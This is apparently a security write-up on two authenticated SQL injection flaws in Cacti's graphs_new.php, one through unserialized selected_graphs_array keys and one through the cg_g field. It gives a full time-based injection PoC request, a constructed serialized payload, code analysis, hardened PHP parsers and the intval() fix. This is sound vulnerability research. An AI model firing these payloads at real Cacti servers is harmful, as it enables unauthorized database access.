Cacti /graphs_new.php SQL Injection Vulnerability
Contents
1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Code Analysis
5. Mitigation
6. Offensive and Defensive Thoughts
1. Vulnerability Description
Another SQL injection in Cacti's graphs_new.php was found and reported as bug http://bugs.cacti.net/view.php?id=2652. The report covers two issues in the same script: host_new_graphs_save() unserializes the POST parameter selected_graphs_array and concatenates one of its array keys into a query (PHP object injection leading to SQL injection), and form_save() accepts the POST parameter cg_g after only a loose `> 0` comparison and passes it into a query in host_new_graphs(). Both require an authenticated session: each PoC below carries a Cacti session cookie and a __csrf_magic token.
Relevant Link:
http://bobao.360.cn/snapshot/index?id=146936
2. Trigger Conditions
0x1: POC1: SQL injection (the cg_g path, Vuln-2 below)
POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
0x2: POC2: object injection (the selected_graphs_array path, Vuln-1 below)
1. Log in
2. POST http://target/cacti/graphs_new.php
Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]
{Injection exp can be found on my server: http://pandas.pw/cacti.exp}
3. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--
3. Affected Scope
4. Code Analysis
0x1: Vuln-1: object injection leading to SQL injection
/graphs_new.php
/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
switch ($_REQUEST["action"]) {
case 'save':
//track function form_save
form_save(); break;
case 'query_reload':
host_reload_query(); header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
break;
default:
include_once("./include/top_header.php"); graphs(); include_once("./include/bottom_footer.php");
break;
}
form_save();
function form_save()
{
..
if (isset($_POST["save_component_new_graphs"]))
{
//Track function host_new_graphs_save()
host_new_graphs_save(); header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
}
host_new_graphs_save();
function host_new_graphs_save()
{
// $selected_graphs_array comes straight from the POST parameter: unserialize() runs on attacker-controlled bytes with no validation of the result (a PHP object injection sink), and every key and value of the resulting array is attacker-chosen
$selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
..
// the nested (three-level) array is then walked and its keys are copied into $snmp_query_array; the key that becomes snmp_query_graph_id is concatenated into the query unescaped, so an array key such as "1 and sleep(5)" (a key that is not a canonical decimal integer stays a string in PHP) is SQL injection
$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
..
}
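Why the unserialize() call above becomes SQL injection, and a decoder that closes both the object-injection and the SQL-injection side of it, as an added example that is not part of the page or of Cacti's code. The nested layout sg => snmp_query_id => snmp_query_graph_id => snmp_index_hash (and cg => graph_template_id) follows the form_save() code analysed below but is an assumption about the serialized form; snmp_query_graph is the table from the original query; vulnerable_queries() and decode_selected_graphs() are hypothetical helpers written for this example.

```php
<?php
// Added example, not Cacti's code. The array shape handled here
// (sg => query_id => graph_id => 32-hex index hash, cg => template_id)
// is an assumption about what graphs_new.php serializes into the form.

// Vulnerable flow, mirroring host_new_graphs_save(): every array KEY is
// attacker chosen, and a key that is not a canonical decimal integer stays
// a string, so "1 and sleep(5)" is concatenated into the WHERE clause as is.
function vulnerable_queries(string $raw): array {
    $queries = [];
    $arr = unserialize(stripslashes($raw));   // objects allowed: PHP object injection as well
    if (!is_array($arr) || !isset($arr['sg']) || !is_array($arr['sg'])) {
        return $queries;
    }
    foreach ($arr['sg'] as $snmp_query_id => $graphs) {
        foreach ($graphs as $snmp_query_graph_id => $indexes) {
            $queries[] = "select graph_template_id from snmp_query_graph where id=" . $snmp_query_graph_id;
        }
    }
    return $queries;
}

// Hardened decode: no objects can be instantiated, and every key is checked
// against the shape it must have before it may reach a query. Any deviation
// rejects the whole structure (returns null).
function decode_selected_graphs(string $raw): ?array {
    $arr = unserialize($raw, ['allowed_classes' => false]);   // PHP 7.0+ option
    if (!is_array($arr)) {
        return null;
    }
    $clean = ['cg' => [], 'sg' => []];
    foreach ($arr as $form_type => $level1) {
        if (!is_array($level1) || !array_key_exists($form_type, $clean)) {
            return null;
        }
        foreach ($level1 as $id1 => $level2) {
            if (!is_int($id1) || $id1 <= 0) {          // "1 and sleep(5)" is a string key
                return null;
            }
            if ($form_type === 'cg') {
                $clean['cg'][$id1] = true;
                continue;
            }
            if (!is_array($level2)) {
                return null;
            }
            foreach ($level2 as $id2 => $level3) {
                if (!is_int($id2) || $id2 <= 0 || !is_array($level3)) {
                    return null;
                }
                foreach (array_keys($level3) as $index_hash) {
                    if (!is_string($index_hash) || !preg_match('/^[a-f0-9]{32}$/', $index_hash)) {
                        return null;
                    }
                    $clean['sg'][$id1][$id2][$index_hash] = true;
                }
            }
        }
    }
    return $clean;
}

// Constructed payloads. serialize() is used so the string lengths are right;
// an attacker would post the same bytes in selected_graphs_array.
$index_hash = 'd41d8cd98f00b204e9800998ecf8427e';
$malicious  = serialize(['sg' => [1 => ['1 and sleep(5)' => [$index_hash => true]]]]);
$benign     = serialize(['sg' => [1 => [5 => [$index_hash => true]]]]);

print_r(vulnerable_queries($malicious));
var_dump(decode_selected_graphs($malicious));
print_r(decode_selected_graphs($benign));
```

Run with `php example.php`: the vulnerable walk yields a query whose WHERE clause carries `1 and sleep(5)`, the hardened decoder returns null for the same bytes and an int-keyed structure for the benign one. The validated ids can then be bound as integers in a prepared statement; the point of validating keys rather than escaping values is that the injection here travels in a key, which no output-side escaping of values would touch.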
0x2: Vuln-2: SQL injection through cg_g
function form_save()
{
if (isset($_POST["save_component_graph"]))
{
/* summarize the 'create graph from host template/snmp index' stuff into an array */
while (list($var, $val) = each($_POST))
{
if (preg_match('/^cg_(\d+)$/', $var, $matches))
{
$selected_graphs["cg"]{$matches[]}{$matches[]} = true;
}
//cg_g is not filtered
elseif (preg_match('/^cg_g$/', $var))
{
if ($_POST["cg_g"] > )
{
$selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
}
}
elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))
{
$selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;
}
} if (isset($selected_graphs))
{
//外部输入参数带入host_new_graphs中
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
exit;
} header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
} if (isset($_POST["save_component_new_graphs"])) {
host_new_graphs_save(); header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
}
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
/* we use object buffering on this page to allow redirection to another page if no
fields are actually drawn */
ob_start();
include_once("./include/top_header.php");
print "<form method='post' action='graphs_new.php'>\n";
$snmp_query_id = 0;
$num_output_fields = array();
while (list($form_type, $form_array) = each($selected_graphs_array)) {
while (list($form_id1, $form_array2) = each($form_array)) {
if ($form_type == "cg") {
// $form_id1 is the raw cg_g value used as an array key; it is interpolated into the query unescaped
$graph_template_id = $form_id1;
html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
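How the PoC1 payload gets past the `> 0` check in form_save() and what reaches the database, beside an allowlist parser that only lets integer ids through, as an added example that is not part of the page or of Cacti's code. passes_cg_g_check(), vulnerable_template_sql(), parse_graph_template_id(), parse_selected_graphs() and fetch_template_name() are hypothetical helpers written for this example; the PDO connection is assumed (Cacti 0.8.8 built query strings and ran them through db_fetch_cell()); graph_templates is the table from the original query.

```php
<?php
// Added example, not Cacti's code. Shows the loose-comparison bypass behind
// PoC1 and the hardened parse of the cg_/cg_g form fields.

// Same expression Cacti 0.8.8f used. Under PHP 5/7 a leading-numeric string
// is cast to its numeric prefix, so "033926697 xor (...)" compares as
// 33926697 > 0; under PHP 8 the int is cast to "0" and compared as a string,
// and the longer string still sorts above "0". Either way the check passes.
function passes_cg_g_check(string $cg_g): bool {
    return $cg_g > 0;
}

// The vulnerable construction: the raw POST value becomes the WHERE clause.
function vulnerable_template_sql(string $cg_g): string {
    return "select name from graph_templates where id=$cg_g";
}

// Hardened form: accept only a non-empty string of decimal digits of sane
// length, then cast. Rejects "1 xor ...", "-1", "1.0", "" and "0".
function parse_graph_template_id(string $value): ?int {
    if (!ctype_digit($value) || strlen($value) > 10) {
        return null;
    }
    $id = (int)$value;
    return $id > 0 ? $id : null;
}

// Walk a POST body the way form_save() does, keeping only validated ids.
function parse_selected_graphs(array $post): array {
    $selected = ['cg' => []];
    foreach ($post as $var => $val) {
        if (preg_match('/^cg_(\d+)$/', (string)$var, $m)) {
            $selected['cg'][(int)$m[1]] = true;
        } elseif ($var === 'cg_g') {
            $id = parse_graph_template_id(is_string($val) ? $val : '');
            if ($id !== null) {
                $selected['cg'][$id] = true;
            }
        }
    }
    return $selected;
}

// The query the hardened path runs: the id is bound as an integer, never
// interpolated. PDO is an assumption for this example.
function fetch_template_name(PDO $db, int $graph_template_id): ?string {
    $stmt = $db->prepare('select name from graph_templates where id = :id');
    $stmt->bindValue(':id', $graph_template_id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string)$name;
}

// Constructed input reproducing the PoC1 body.
$payload = '033926697 xor (select(0)from(select sleep(5))v)';
var_dump(passes_cg_g_check($payload));
echo vulnerable_template_sql($payload), "\n";
var_dump(parse_graph_template_id($payload));
var_dump(parse_selected_graphs(['cg_g' => $payload, 'cg_7' => 'on', 'host_id' => '2']));
```

Run with `php example.php`: the original check reports true for the payload and the printed query shows the `xor (select ... sleep(5))` subquery appended to the WHERE clause, while the hardened parser returns null for cg_g and only keeps the id 7 taken from the regex-validated cg_7 field. The same validation is what the intval() cast in the upstream fix achieves for this sink; the prepared statement is the general form for queries that cannot be reduced to an integer.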
Relevant Link:
http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652
5. Mitigation
/graphs_new.php
function host_new_graphs_save()
{
..
/*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/
$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
..
}
/graphs_new.php
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
/* we use object buffering on this page to allow redirection to another page if no
fields are actually drawn */
ob_start();
include_once("./include/top_header.php");
print "<form method='post' action='graphs_new.php'>\n";
$snmp_query_id = 0;
$num_output_fields = array();
while (list($form_type, $form_array) = each($selected_graphs_array)) {
while (list($form_id1, $form_array2) = each($form_array)) {
if ($form_type == "cg") {
// $form_id1 is the raw cg_g value
$graph_template_id = $form_id1;
/* fix: cast to integer before the value reaches the query */
$graph_template_id = intval($graph_template_id);
/* end of fix */
html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
Casting with intval() is adequate for both sinks because each value is only ever used as an integer id; a query that has to take arbitrary strings needs a prepared statement instead. Note what the fix does not change: host_new_graphs_save() still runs unserialize(stripslashes($_POST["selected_graphs_array"])) on attacker-controlled bytes, so the SQL injection is closed but the deserialization of untrusted data remains; if any loadable class has a magic method such as __wakeup() or __destruct(), that is still a PHP object injection sink. Decoding with objects disallowed (unserialize($s, ['allowed_classes' => false]) on PHP 7+) and validating every key of the result, or replacing the serialized form with a non-object encoding, removes it.
Relevant Link:
http://www.cacti.net/download_cacti.php
6. Offensive and Defensive Thoughts
Copyright (c) 2016 Little5ann All rights reserved